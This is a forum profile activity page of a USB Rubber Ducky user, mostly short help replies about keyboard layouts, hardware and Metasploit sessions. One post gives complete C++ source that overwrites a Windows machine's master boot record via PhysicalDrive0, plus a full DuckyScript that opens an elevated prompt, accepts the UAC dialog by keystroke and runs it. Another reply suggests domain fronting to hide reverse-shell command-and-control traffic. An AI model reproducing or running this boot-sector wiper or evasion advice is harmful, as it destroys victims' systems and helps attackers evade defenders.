-
Posts
66 -
Joined
-
Last visited
-
Days Won
1
Contact Methods
-
Website URL
https://thoughtful-dev.com
Profile Information
-
Gender
Not Telling
-
Location
Krypton
Recent Profile Visitors
1,787 profile views
ThoughtfulDev's Achievements
Newbie (1/14)
-
kuyaya started following ThoughtfulDev
-
How about using Domain Fronting? You can connect your C&C Server to a VPN with port forwarding and then let the shell connec to that port on the vpn side which will then be forwarded to your C&C... in theory.
-
be quiet! Silent Base 800 Black, No Window ASUS Prime X370-Pro AMD Ryzen 7 1700X 2x8GB Vengeance DDR4-3200 be quiet! Silent Loop 120mm MSI GTX 770 Samsung 850 Evo 250GB SSD 550 Watt Corsair Semi Modular PSU (dont know the actual name rn) Wanted to buy a new GPU for Machine Learning but prices are so damn high...
-
Problem with de accent mark, problemas con los accentos
ThoughtfulDev replied to Emi's topic in Classic USB Rubber Ducky
Did you changed the Keyboard layout to "es" when compiling the duckyscript? -
Reminds me of my PyDuckGen. But seems like your script works ;) (I have a look if i can improve your script)
-
I guess that this is not possible since no driver is loaded and/or can be installed if you arent on win/linux/osx
-
I dont have the original one just my modified version from PyDuckGen: Click
- 16 replies
-
- 2
-
- powershell
- meterpreter
- (and 6 more)
-
this is wrong no quotes and = are needed to it should look like this: STRING K0cj0mKMchAAAAAAAAAAC0MHOM6B-qtOB9zszza03NGx21eRsaKiurS
-
that would be possible if he were using a BashBunny haha :) since the ducky is only a HID this wont work directly on the ducky.
-
As far as i know the ducky cant do that on it self. maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that and the ducky just presses CTRL+V to copy that random character?
-
The intel ones do work with e.g Gallium OS(which is ubuntu + the necessary chromebook drivers). (use it myself)
-
I dont get your problem? Session 1 was opened...so just use sessions to list your sessions and interact with them. This is basic metasploit stuff... maybe you should have a look at metasploit minute.
-
Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING) I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS. CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM 1. Download the precompiled boot.exe (source code is here if you want to compile yourself): #include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; } 2. Create Folder exec on your ducky sdcard and copy boot.exe into it. 3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin 4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY): REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier boot.exe
-
Installing drivers on target machines issue
ThoughtfulDev replied to Launchpad McQuack's topic in Classic USB Rubber Ducky
Nope no solution except what you already said: Delay -
try encoding in your keyboard layout (default is US)
-
ThoughtfulDev changed their profile photo
-
You can run powershell and cmd without admin privs or am i mistaken? e.g ctrl +r and then powershell/cmd.exe will run the it without admin privs.